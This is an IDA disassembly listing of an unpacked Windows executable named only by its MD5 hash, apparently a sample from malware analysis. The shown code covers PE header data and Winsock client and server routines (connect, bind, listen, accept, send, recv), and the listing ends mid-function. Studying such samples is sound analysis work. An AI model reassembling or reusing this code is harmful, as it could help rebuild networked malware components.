;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 919EC8D2405C6A467C8847CC0277A31E
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure data
HEADER segment page public 'DATA' use32
assume cs:HEADER
;org 400000h
__ImageBase dd 5A4Dh, 2 dup(0) ; DATA XREF: sub_404B5A�r
; sub_404B5A+10�r ...
dd 4550h, 3014Ch, 21475346h, 2 dup(0)
dd 10300E0h, 10Bh, 0B600h, 6000h, 0
dd 154h, 1000h, 0Ch, 400000h, 1000h, 200h, 4, 0 ; DATA XREF: sub_404B5A+B�r
dd 5, 0
dd 1E200h, 200h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 1E000h, 84h, 1Eh dup(0)
dd 14000h, 1000h, 14000h, 1000h, 3 dup(0)
dd 0C00000E0h, 2 dup(0)
dd 9000h, 15000h, 9000h, 15000h, 3 dup(0)
dd 0C00000E0h
; ---------------------------------------------------------------------------
;
; The code at 400000..401000 is hidden from normal disassembly
; and was loaded because the user ordered to load it explicitly
;
; <<<< IT MAY CONTAIN TROJAN HORSES, VIRUSES, AND DO HARMFUL THINGS >>>
;
;
public start
start:
imul esp, cs:[ecx+74h], 3261h
adc [eax], al
; ---------------------------------------------------------------------------
db 0
dword_400160 dd 1E000h, 200h, 1E000h, 1F7313FFh, 0B04180B6h, 1213FF10h
dd 0C0000040h, 0E0EBAA3Ah, 20853FFh, 1D983F6h, 53FF0E75h
dd 0AC24EB04h, 2D74E8D1h, 18EBC913h, 0E0C14891h, 53FFAC08h
dd 0F8433B04h, 0FC800A73h, 83067305h, 2777FF8h, 8B954141h
dd 5600B6C5h, 0F02BF78Bh, 0EB5EA4F3h, 97AD5E9Fh, 53FF50ADh
dd 78B9510h, 75F37840h, 0C63FF03h, 53FF5550h, 0EEEBAB14h
dd 0FF41C933h, 0FFC91313h, 0C3F87213h, 575D202h, 1246168Ah
dd 454BC3D2h, 4C454E52h, 642E3233h, 6C6Ch
align 1000h
HEADER ends
; File Name : u:\work\919ec8d2405c6a467c8847cc0277a31e_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00014000 ( 81920.)
; Section size in file : 00014000 ( 81920.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
seg001 segment para public 'BSS' use32
assume cs:seg001
;org 401000h
assume es:nothing, ss:nothing, ds:seg001, fs:nothing, gs:nothing
loc_401000: ; DATA XREF: seg002:0041CFA8�o
mov eax, [esp+4]
test eax, eax
jnz short loc_40100E
mov eax, offset aInvalidInstanc ; "Invalid instance or socket"
retn
; ---------------------------------------------------------------------------
loc_40100E: ; CODE XREF: seg001:00401006�j
mov eax, [eax+0Ch]
cmp eax, 6 ; switch 7 cases
ja short loc_401047 ; default
jmp off_401050[eax*4] ; switch jump
loc_40101D: ; DATA XREF: seg001:off_401050�o
mov eax, offset aOperationSucce ; jumptable 00401016 case 0
retn
; ---------------------------------------------------------------------------
loc_401023: ; CODE XREF: seg001:00401016�j
; DATA XREF: seg001:off_401050�o
mov eax, offset aUnableToResolv ; jumptable 00401016 case 1
retn
; ---------------------------------------------------------------------------
loc_401029: ; CODE XREF: seg001:00401016�j
; DATA XREF: seg001:off_401050�o
mov eax, offset aUnableToConnec ; jumptable 00401016 case 2
retn
; ---------------------------------------------------------------------------
loc_40102F: ; CODE XREF: seg001:00401016�j
; DATA XREF: seg001:off_401050�o
mov eax, offset aUnableToCreate ; jumptable 00401016 case 3
retn
; ---------------------------------------------------------------------------
loc_401035: ; CODE XREF: seg001:00401016�j
; DATA XREF: seg001:off_401050�o
mov eax, offset aUnableToBindSo ; jumptable 00401016 case 4
retn
; ---------------------------------------------------------------------------
loc_40103B: ; CODE XREF: seg001:00401016�j
; DATA XREF: seg001:off_401050�o
mov eax, offset aPortIsInUse ; jumptable 00401016 case 5
retn
; ---------------------------------------------------------------------------
loc_401041: ; CODE XREF: seg001:00401016�j
; DATA XREF: seg001:off_401050�o
mov eax, offset aOperationPendi ; jumptable 00401016 case 6
retn
; ---------------------------------------------------------------------------
loc_401047: ; CODE XREF: seg001:00401014�j
mov eax, offset aUnknown ; default
retn
; ---------------------------------------------------------------------------
align 10h
off_401050 dd offset loc_40101D ; DATA XREF: seg001:00401016�r
dd offset loc_401023 ; jump table for switch statement
dd offset loc_401029
dd offset loc_40102F
dd offset loc_401035
dd offset loc_40103B
dd offset loc_401041
align 10h
push ecx
push edi
mov edi, [esp+0Ch]
push edi
call sub_403A06 ; inet_addr
test eax, eax
jz short loc_401094
push edi
call sub_403A06 ; inet_addr
cmp eax, 0FFFFFFFFh
jz short loc_401094
push edi
call sub_403A06 ; inet_addr
pop edi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401094: ; CODE XREF: seg001:0040107E�j
; seg001:00401089�j
push esi
mov esi, dword_4113C8
test esi, esi
jz short loc_4010D8
nop
loc_4010A0: ; CODE XREF: seg001:004010D6�j
mov ecx, [esi]
test ecx, ecx
jz short loc_4010D1
mov eax, edi
loc_4010A8: ; CODE XREF: seg001:004010C2�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_4010C8
test dl, dl
jz short loc_4010C4
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_4010C8
add eax, 2
add ecx, 2
test dl, dl
jnz short loc_4010A8
loc_4010C4: ; CODE XREF: seg001:004010B0�j
xor eax, eax
jmp short loc_4010CD
; ---------------------------------------------------------------------------
loc_4010C8: ; CODE XREF: seg001:004010AC�j
; seg001:004010B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4010CD: ; CODE XREF: seg001:004010C6�j
test eax, eax
jz short loc_4010E6
loc_4010D1: ; CODE XREF: seg001:004010A4�j
mov esi, [esi+8]
test esi, esi
jnz short loc_4010A0
loc_4010D8: ; CODE XREF: seg001:0040109D�j
push edi
call sub_403A00 ; gethostbyname
test eax, eax
jnz short loc_4010ED
pop esi
pop edi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4010E6: ; CODE XREF: seg001:004010CF�j
mov eax, [esi+4]
pop esi
pop edi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4010ED: ; CODE XREF: seg001:004010E0�j
movsx ecx, word ptr [eax+0Ah]
mov edx, [eax+0Ch]
mov eax, [edx]
push ecx
push eax
lea ecx, [esp+10h]
push ecx
call sub_403BE0
push 0Ch
call sub_403B17
push edi
mov esi, eax
call sub_403A78
mov [esi], eax
mov eax, [esp+1Ch]
mov [esi+4], eax
mov edx, dword_4113C8
add esp, 14h
mov [esi+8], edx
mov dword_4113C8, esi
pop esi
pop edi
pop ecx
retn
; ---------------------------------------------------------------------------
sub esp, 320h
push esi
push edi
mov edi, [esp+32Ch]
xor esi, esi
cmp edi, esi
jnz short loc_401151
pop edi
lea eax, [esi+7]
pop esi
add esp, 320h
retn
; ---------------------------------------------------------------------------
loc_401151: ; CODE XREF: seg001:00401143�j
push ebp
mov ebp, [esp+334h]
xor eax, eax
cmp ebp, esi
jbe short loc_40116D
nop
loc_401160: ; CODE XREF: seg001:0040116B�j
mov ecx, [edi+eax*4]
add eax, 1
cmp eax, ebp
mov [ecx+10h], esi
jb short loc_401160
loc_40116D: ; CODE XREF: seg001:0040115D�j
mov eax, [esp+33Ch]
cmp eax, esi
jle short loc_40118A
lea edx, [esp+18h]
mov [esp+18h], eax
mov [esp+1Ch], esi
mov [esp+14h], edx
jmp short loc_40118E
; ---------------------------------------------------------------------------
loc_40118A: ; CODE XREF: seg001:00401176�j
mov [esp+14h], esi
loc_40118E: ; CODE XREF: seg001:00401188�j
mov dl, [esp+338h]
mov al, dl
and al, 1
push ebx
mov [esp+12h], al
jz short loc_4011DB
xor ecx, ecx
xor eax, eax
cmp ebp, esi
mov [esp+24h], ecx
jbe short loc_4011D1
lea esp, [esp+0]
loc_4011B0: ; CODE XREF: seg001:004011CF�j
cmp ecx, 40h
jnb short loc_4011CA
mov ebx, [edi+eax*4]
mov ebx, [ebx+8]
mov [esp+ecx*4+28h], ebx
mov ecx, [esp+24h]
add ecx, 1
mov [esp+24h], ecx
loc_4011CA: ; CODE XREF: seg001:004011B3�j
add eax, 1
cmp eax, ebp
jb short loc_4011B0
loc_4011D1: ; CODE XREF: seg001:004011AA�j
lea eax, [esp+24h]
mov [esp+14h], eax
jmp short loc_4011DF
; ---------------------------------------------------------------------------
loc_4011DB: ; CODE XREF: seg001:0040119E�j
mov [esp+14h], esi
loc_4011DF: ; CODE XREF: seg001:004011D9�j
mov al, dl
and al, 2
mov [esp+11h], al
jz short loc_40122B
xor ecx, ecx
xor eax, eax
cmp ebp, esi
mov [esp+128h], ecx
jbe short loc_401222
loc_4011F8: ; CODE XREF: seg001:00401220�j
cmp ecx, 40h
jnb short loc_40121B
mov ebx, [edi+eax*4]
mov ebx, [ebx+8]
mov [esp+ecx*4+12Ch], ebx
mov ecx, [esp+128h]
add ecx, 1
mov [esp+128h], ecx
loc_40121B: ; CODE XREF: seg001:004011FB�j
add eax, 1
cmp eax, ebp
jb short loc_4011F8
loc_401222: ; CODE XREF: seg001:004011F6�j
lea ebx, [esp+128h]
jmp short loc_40122D
; ---------------------------------------------------------------------------
loc_40122B: ; CODE XREF: seg001:004011E7�j
xor ebx, ebx
loc_40122D: ; CODE XREF: seg001:00401229�j
mov al, dl
and al, 4
mov [esp+13h], al
jz short loc_401277
xor ecx, ecx
xor eax, eax
cmp ebp, esi
mov [esp+22Ch], ecx
jbe short loc_401270
loc_401246: ; CODE XREF: seg001:0040126E�j
cmp ecx, 40h
jnb short loc_401269
mov edx, [edi+eax*4]
mov edx, [edx+8]
mov [esp+ecx*4+230h], edx
mov ecx, [esp+22Ch]
add ecx, 1
mov [esp+22Ch], ecx
loc_401269: ; CODE XREF: seg001:00401249�j
add eax, 1
cmp eax, ebp
jb short loc_401246
loc_401270: ; CODE XREF: seg001:00401244�j
lea esi, [esp+22Ch]
loc_401277: ; CODE XREF: seg001:00401235�j
xor eax, eax
xor ecx, ecx
test ebp, ebp
jbe short loc_401293
nop
loc_401280: ; CODE XREF: seg001:00401291�j
mov edx, [edi+eax*4]
mov edx, [edx+8]
cmp edx, ecx
jle short loc_40128C
mov ecx, edx
loc_40128C: ; CODE XREF: seg001:00401288�j
add eax, 1
cmp eax, ebp
jb short loc_401280
loc_401293: ; CODE XREF: seg001:0040127D�j
mov eax, [esp+18h]
mov edx, [esp+14h]
push eax
push esi
push ebx
push edx
add ecx, 1
push ecx
call sub_403A12 ; select
xor ebx, ebx
cmp eax, ebx
jnz short loc_4012D8
xor ecx, ecx
cmp ebp, ebx
lea eax, [ebx+6]
jbe loc_40137F
jmp short loc_4012C0
; ---------------------------------------------------------------------------
align 10h
loc_4012C0: ; CODE XREF: seg001:004012BB�j
; seg001:004012CB�j
mov edx, [edi+ecx*4]
add ecx, 1
cmp ecx, ebp
mov [edx+0Ch], eax
jb short loc_4012C0
pop ebx
pop ebp
pop edi
pop esi
add esp, 320h
retn
; ---------------------------------------------------------------------------
loc_4012D8: ; CODE XREF: seg001:004012AC�j
cmp eax, 0FFFFFFFFh
jnz short loc_4012ED
pop ebx
pop ebp
pop edi
mov eax, 8
pop esi
add esp, 320h
retn
; ---------------------------------------------------------------------------
loc_4012ED: ; CODE XREF: seg001:004012DB�j
xor esi, esi
cmp ebp, ebx
jbe short loc_401369
loc_4012F3: ; CODE XREF: seg001:00401367�j
cmp byte ptr [esp+12h], 0
jz short loc_401316
mov ecx, [edi+esi*4]
mov edx, [ecx+8]
lea eax, [esp+24h]
push eax
push edx
call sub_403A0C ; __WSAFDIsSet
test eax, eax
jz short loc_401316
mov eax, [edi+esi*4]
add dword ptr [eax+10h], 1
loc_401316: ; CODE XREF: seg001:004012F8�j
; seg001:0040130D�j
cmp byte ptr [esp+11h], 0
jz short loc_40133C
mov ecx, [edi+esi*4]
mov edx, [ecx+8]
lea eax, [esp+128h]
push eax
push edx
call sub_403A0C ; __WSAFDIsSet
test eax, eax
jz short loc_40133C
mov eax, [edi+esi*4]
add dword ptr [eax+10h], 2
loc_40133C: ; CODE XREF: seg001:0040131B�j
; seg001:00401333�j
cmp byte ptr [esp+13h], 0
jz short loc_401362
mov ecx, [edi+esi*4]
mov edx, [ecx+8]
lea eax, [esp+22Ch]
push eax
push edx
call sub_403A0C ; __WSAFDIsSet
test eax, eax
jz short loc_401362
mov eax, [edi+esi*4]
add dword ptr [eax+10h], 4
loc_401362: ; CODE XREF: seg001:00401341�j
; seg001:00401359�j
add esi, 1
cmp esi, ebp
jb short loc_4012F3
loc_401369: ; CODE XREF: seg001:004012F1�j
xor eax, eax
cmp ebp, ebx
jbe short loc_40137D
nop
loc_401370: ; CODE XREF: seg001:0040137B�j
mov ecx, [edi+eax*4]
add eax, 1
cmp eax, ebp
mov [ecx+0Ch], ebx
jb short loc_401370
loc_40137D: ; CODE XREF: seg001:0040136D�j
xor eax, eax
loc_40137F: ; CODE XREF: seg001:004012B5�j
pop ebx
pop ebp
pop edi
pop esi
add esp, 320h
retn
; ---------------------------------------------------------------------------
align 10h
sub esp, 18h
mov eax, dword_410440
xor eax, esp
mov [esp+14h], eax
push esi
mov esi, [esp+20h]
test esi, esi
mov dword ptr [esp+4], 1
jnz short loc_4013C2
lea eax, [esi+7]
pop esi
mov ecx, [esp+14h]
xor ecx, esp
call sub_403F45
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_4013C2: ; CODE XREF: seg001:004013AD�j
cmp dword ptr [esi+8], 0
jnz short loc_4013E0
mov eax, 7
mov [esi+0Ch], eax
pop esi
mov ecx, [esp+14h]
xor ecx, esp
call sub_403F45
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_4013E0: ; CODE XREF: seg001:004013C6�j
mov ecx, [esp+28h]
mov eax, [esp+24h]
push ecx
mov dword ptr [esi+10h], 0
mov word ptr [esp+0Ch], 2
mov [esp+10h], eax
call sub_403A24 ; htons
push 4
lea edx, [esp+8]
push edx
push 4
mov [esp+16h], ax
mov eax, [esi+8]
push 0FFFFh
push eax
call sub_403A1E ; setsockopt
mov edx, [esi+8]
push 10h
lea ecx, [esp+0Ch]
push ecx
push edx
mov dword ptr [esp+10h], 1
call sub_403A18 ; bind
test eax, eax
jge short loc_401454
mov dword ptr [esi+0Ch], 4
mov eax, 4
pop esi
mov ecx, [esp+14h]
xor ecx, esp
call sub_403F45
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_401454: ; CODE XREF: seg001:00401436�j
mov ecx, [esp+18h]
mov dword ptr [esi+0Ch], 0
pop esi
xor ecx, esp
xor eax, eax
call sub_403F45
add esp, 18h
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401470 proc near ; CODE XREF: sub_402040+BBA�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_40147E
lea eax, [esi+7]
pop esi
retn
; ---------------------------------------------------------------------------
loc_40147E: ; CODE XREF: sub_401470+7�j
mov dword ptr [esi+10h], 0
call sub_403F8F
mov dword ptr [eax], 0
mov ecx, [esi+8]
push 10h
lea eax, [esi+28h]
push eax
push ecx
call sub_403A30 ; connect
test eax, eax
jz short loc_4014DB
call sub_403A2A ; WSAGetLastError
cmp eax, 2748h
jz short loc_4014DB
call sub_403A2A ; WSAGetLastError
cmp eax, 2735h
jz short loc_4014D1
call sub_403A2A ; WSAGetLastError
cmp eax, 2733h
jz short loc_4014D1
mov eax, 2
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4014D1: ; CODE XREF: sub_401470+49�j
; sub_401470+55�j
mov eax, 6
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4014DB: ; CODE XREF: sub_401470+31�j
; sub_401470+3D�j
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
sub_401470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4014F0 proc near ; CODE XREF: sub_402040+56B�p
; sub_402040+7FE�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push esi
mov esi, [esp+8+arg_0]
test esi, esi
mov [esp+8+var_4], 1
jnz short loc_401508
lea eax, [esi+7]
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401508: ; CODE XREF: sub_4014F0+10�j
push 6
push 1
push 2
mov dword ptr [esi+10h], 0
mov dword ptr [esi+24h], 0
call sub_403A3C ; socket
test eax, eax
mov [esi+8], eax
jge short loc_401533
mov eax, 3
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401533: ; CODE XREF: sub_4014F0+36�j
push edi
mov edi, [esp+0Ch+arg_4]
push edi
call sub_403A06 ; inet_addr
test eax, eax
jz short loc_401558
push edi
call sub_403A06 ; inet_addr
cmp eax, 0FFFFFFFFh
jz short loc_401558
push edi
call sub_403A06 ; inet_addr
mov [esi+2Ch], eax
jmp short loc_401589
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_4014F0+50�j
; sub_4014F0+5B�j
push edi
call sub_403A00 ; gethostbyname
test eax, eax
jnz short loc_401572
pop edi
mov dword ptr [esi+0Ch], 1
mov eax, 1
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401572: ; CODE XREF: sub_4014F0+70�j
movsx ecx, word ptr [eax+0Ah]
mov edx, [eax+0Ch]
mov eax, [edx]
push ecx
push eax
lea ecx, [esi+2Ch]
push ecx
call sub_403BE0
add esp, 0Ch
loc_401589: ; CODE XREF: sub_4014F0+66�j
mov edx, [esp+0Ch+arg_8]
push edx
mov word ptr [esi+28h], 2
call sub_403A24 ; htons
mov ecx, [esi+8]
mov [esi+2Ah], ax
lea eax, [esp+0Ch+var_4]
push eax
push 8004667Eh
push ecx
call sub_403A36 ; ioctlsocket
pop edi
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
pop ecx
retn
sub_4014F0 endp
; ---------------------------------------------------------------------------
align 10h
push ecx
push ebx
push esi
mov esi, [esp+10h]
test esi, esi
mov ebx, 1
mov [esp+8], ebx
jnz short loc_4015DB
pop esi
lea eax, [ebx+6]
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: seg001:004015D2�j
push 6
push ebx
push 2
mov dword ptr [esi+10h], 0
call sub_403A3C ; socket
test eax, eax
mov [esi+8], eax
jge short loc_4015FF
mov eax, 3
mov [esi+0Ch], eax
pop esi
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4015FF: ; CODE XREF: seg001:004015F1�j
push edi
mov edi, [esp+18h]
push edi
call sub_403A06 ; inet_addr
test eax, eax
jz short loc_401624
push edi
call sub_403A06 ; inet_addr
cmp eax, 0FFFFFFFFh
jz short loc_401624
push edi
call sub_403A06 ; inet_addr
mov [esi+2Ch], eax
jmp short loc_40164F
; ---------------------------------------------------------------------------
loc_401624: ; CODE XREF: seg001:0040160C�j
; seg001:00401617�j
push edi
call sub_403A00 ; gethostbyname
test eax, eax
jnz short loc_401638
pop edi
mov [esi+0Ch], ebx
pop esi
mov eax, ebx
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401638: ; CODE XREF: seg001:0040162C�j
movsx ecx, word ptr [eax+0Ah]
mov edx, [eax+0Ch]
mov eax, [edx]
push ecx
push eax
lea ecx, [esi+2Ch]
push ecx
call sub_403BE0
add esp, 0Ch
loc_40164F: ; CODE XREF: seg001:00401622�j
mov edx, [esp+1Ch]
push ebp
lea ebx, [esi+28h]
push edx
mov word ptr [ebx], 2
call sub_403A24 ; htons
mov ecx, [esi+8]
mov [esi+2Ah], ax
lea eax, [esp+10h]
push eax
push 8004667Eh
push ecx
call sub_403A36 ; ioctlsocket
push 0
call sub_4067A5
push 0
mov edi, eax
call sub_4067A5
sub eax, edi
add esp, 8
cmp eax, 0Ah
jnb short loc_4016EC
mov ebp, dword_40D0EC
lea esp, [esp+0]
loc_4016A0: ; CODE XREF: seg001:004016EA�j
mov edx, [esi+8]
push 10h
push ebx
push edx
call sub_403A30 ; connect
test eax, eax
jz short loc_4016FA
call sub_403A2A ; WSAGetLastError
cmp eax, 2748h
jz short loc_4016FA
call sub_403A2A ; WSAGetLastError
cmp eax, 2735h
jz short loc_4016D4
call sub_403A2A ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4016EC
loc_4016D4: ; CODE XREF: seg001:004016C6�j
push 3E8h
call ebp ; Sleep
push 0
call sub_4067A5
sub eax, edi
add esp, 4
cmp eax, 0Ah
jb short loc_4016A0
loc_4016EC: ; CODE XREF: seg001:00401691�j
; seg001:004016D2�j
pop ebp
mov eax, 2
pop edi
mov [esi+0Ch], eax
pop esi
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4016FA: ; CODE XREF: seg001:004016AE�j
; seg001:004016BA�j
pop ebp
pop edi
mov dword ptr [esi+0Ch], 0
pop esi
xor eax, eax
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401710 proc near ; CODE XREF: sub_402040+C3�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push esi
mov esi, [esp+8+arg_0]
test esi, esi
mov [esp+8+var_4], 1
jnz short loc_401728
lea eax, [esi+7]
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401728: ; CODE XREF: sub_401710+10�j
push 6
push 1
push 2
mov dword ptr [esi+10h], 0
call sub_403A3C ; socket
test eax, eax
mov [esi+8], eax
jge short loc_40174C
mov eax, 3
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40174C: ; CODE XREF: sub_401710+2F�j
mov eax, [esp+8+arg_4]
push edi
lea edi, [esi+28h]
push eax
mov word ptr [edi], 2
mov dword ptr [esi+2Ch], 0
call sub_403A24 ; htons
mov ecx, [esi+8]
push 10h
push edi
push ecx
mov [esi+2Ah], ax
call sub_403A18 ; bind
test eax, eax
pop edi
jge short loc_401786
mov eax, 4
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401786: ; CODE XREF: sub_401710+69�j
mov edx, [esi+8]
push 32h
push edx
call sub_403A42 ; listen
test eax, eax
jge short loc_4017A0
mov eax, 5
mov [esi+0Ch], eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4017A0: ; CODE XREF: sub_401710+83�j
mov ecx, [esi+8]
lea eax, [esp+8+var_4]
push eax
push 8004667Eh
push ecx
call sub_403A36 ; ioctlsocket
mov dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
pop ecx
retn
sub_401710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4017C0 proc near ; CODE XREF: sub_402040+1FF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
test ebx, ebx
push ebp
jz short loc_401834
mov ebp, [esp+8+arg_4]
test ebp, ebp
jz short loc_401834
push esi
push edi
mov dword ptr [ebx+10h], 0
mov ecx, 0Fh
mov esi, ebx
mov edi, ebp
rep movsd
mov edx, [ebx+8]
lea eax, [esp+10h+arg_0]
push eax
lea ecx, [ebp+28h]
push ecx
push edx
mov [esp+1Ch+arg_0], 10h
call sub_403A48 ; accept
test eax, eax
pop edi
pop esi
jge short loc_40181E
push 3Ch
push 0
push ebp
call sub_403FE0
add esp, 0Ch
mov eax, 6
pop ebp
mov [ebx+0Ch], eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40181E: ; CODE XREF: sub_4017C0+44�j
mov [ebp+8], eax
mov eax, [esp+8+arg_0]
mov [ebx+10h], eax
pop ebp
mov dword ptr [ebx+0Ch], 0
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401834: ; CODE XREF: sub_4017C0+8�j
; sub_4017C0+10�j
pop ebp
mov eax, 7
pop ebx
retn
sub_4017C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401840 proc near ; CODE XREF: sub_401960+79�p
; sub_402040+2F9�p ...
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 110h
push ebp
push esi
mov esi, [esp+118h+arg_0]
xor ebp, ebp
cmp esi, ebp
jnz short loc_401861
pop esi
lea eax, [ebp+7]
pop ebp
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_401861: ; CODE XREF: sub_401840+13�j
mov eax, [esi+24h]
push ebx
push edi
mov edi, [esp+120h+arg_8]
add eax, edi
push eax
call sub_403B17
mov ebx, eax
add esp, 4
cmp ebx, ebp
jz loc_40192F
mov ecx, [esp+120h+arg_4]
mov edx, [esi+24h]
push edi
push ecx
add edx, ebx
push edx
call sub_403BE0
mov eax, [esi+1Ch]
add esp, 0Ch
cmp eax, ebp
jz short loc_4018C4
mov ecx, [esi+24h]
push ecx
push eax
push ebx
call sub_403BE0
mov eax, [esi+1Ch]
add esp, 0Ch
cmp eax, ebp
jz short loc_4018C1
push eax
call sub_40405A
add esp, 4
mov [esi+1Ch], ebp
loc_4018C1: ; CODE XREF: sub_401840+73�j
mov [esi+1Ch], ebp
loc_4018C4: ; CODE XREF: sub_401840+5E�j
mov eax, [esi+8]
add edi, [esi+24h]
xor ecx, ecx
lea edx, [esp+120h+var_110]
push edx
mov [esp+124h+var_110], ecx
mov [esp+124h+var_10C], ecx
push ebp
lea ecx, [esp+128h+var_104]
push ecx
mov [esp+12Ch+var_100], eax
push ebp
add eax, 1
push eax
mov [esi+24h], ebp
mov [esp+134h+var_104], 1
mov [esp+134h+var_110], ebp
mov [esp+134h+var_10C], ebp
call sub_403A12 ; select
test eax, eax
jle short loc_40193A
mov [esi+10h], ebp
call sub_403F8F
push ebp
push edi
mov [eax], ebp
mov edx, [esi+8]
push ebx
push edx
call sub_403A4E ; send
cmp eax, edi
jb short loc_40193C
push ebx
mov [esi+10h], eax
mov [esi+0Ch], ebp
call sub_40405A
add esp, 4
xor eax, eax
loc_40192F: ; CODE XREF: sub_401840+3C�j
pop edi
pop ebx
pop esi
pop ebp
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_40193A: ; CODE XREF: sub_401840+C2�j
mov eax, ebp
loc_40193C: ; CODE XREF: sub_401840+DC�j
mov [esi+24h], edi
pop edi
mov [esi+10h], eax
mov [esi+1Ch], ebx
mov eax, 6
pop ebx
mov [esi+0Ch], eax
pop esi
pop ebp
add esp, 110h
retn
sub_401840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401960 proc near ; CODE XREF: sub_402040+C3E�p
; sub_402040+CF7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
push edi
mov esi, 0BBBh
loc_401967: ; CODE XREF: sub_401960+5A�j
mov eax, dword_4113C0
test eax, eax
jz short loc_401979
push eax
call sub_40405A
add esp, 4
loc_401979: ; CODE XREF: sub_401960+E�j
lea eax, [esi+1]
push eax
call sub_403B17
mov edi, eax
add esp, 4
test edi, edi
mov dword_4113C0, edi
jz short loc_401A04
push esi
push 0
push edi
call sub_403FE0
mov edx, [esp+14h+arg_4]
lea ecx, [esp+14h+arg_8]
push ecx
push edx
lea eax, [esi-2]
push eax
push edi
call sub_404199
add esp, 1Ch
add esi, 3E8h
cmp eax, 0FFFFFFFFh
jz short loc_401967
mov edx, dword_4113C0
mov eax, edx
lea esi, [eax+1]
loc_4019C7: ; CODE XREF: sub_401960+6E�j
mov cl, [eax]
add eax, 1
test cl, cl
jnz short loc_4019C7
mov ecx, [esp+8+arg_0]
sub eax, esi
push eax
push edx
push ecx
call sub_401840
mov esi, eax
mov eax, dword_4113C0
add esp, 0Ch
test eax, eax
jz short loc_4019FF
push eax
call sub_40405A
add esp, 4
mov dword_4113C0, 0
loc_4019FF: ; CODE XREF: sub_401960+8A�j
pop edi
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_401A04: ; CODE XREF: sub_401960+2F�j
pop edi
xor eax, eax
pop esi
retn
sub_401960 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401A10 proc near ; CODE XREF: sub_402040+338�p
; sub_402040+A3C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_401A1E
lea eax, [esi+7]
pop esi
retn
; ---------------------------------------------------------------------------
loc_401A1E: ; CODE XREF: sub_401A10+7�j
mov eax, [esp+4+arg_4]
mov ecx, [esi+8]
push edi
mov edi, [esp+8+arg_8]
push 0
push edi
push eax
push ecx
mov dword ptr [esi+10h], 0
call sub_403A54 ; recv
test eax, eax
